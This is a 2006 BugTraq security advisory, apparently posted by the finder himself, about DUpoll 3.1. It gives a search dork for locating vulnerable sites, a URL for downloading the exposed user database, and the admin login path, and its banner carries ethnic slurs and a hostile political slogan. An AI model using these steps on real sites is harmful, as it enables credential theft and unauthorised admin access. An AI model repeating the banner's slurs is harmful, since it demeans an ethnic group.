BugTraq
DUpoll 3.1 security alert Aug 29 2006 04:03PM
bozkurtserdar bozkurtserdar com
########################################################################
#####

#DUpoll 3.1 application bug #

# #

#BoZKuRTSeRDaR Ülkücü Milliyetçi Türkçü İnternet korsanı #

# #

#kahrolsun pkk kahrolsun Komünizm fuck kurdish lamerz #

# #

#Discovered by: BoZKuRTSeRDaR bozkurtserdar[at]bozkurtserdar[dot]com #

# #

# #

########################################################################
#####

Vendor URL : DUpoll http://www.duware.com/demos/DUpoll/

Dork/Search for: "Powered by DUpoll"

Exploit :

http://www.target.com/[DUpollpatch]/_private/Dupoll.mdb

database downloading

database users table administratory users and pasword

go dir

http://www.target.com/[DUpollpatch]/admin/default.asp

Security Adivisory | Edithor by BoZKuRTSeRDaR

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus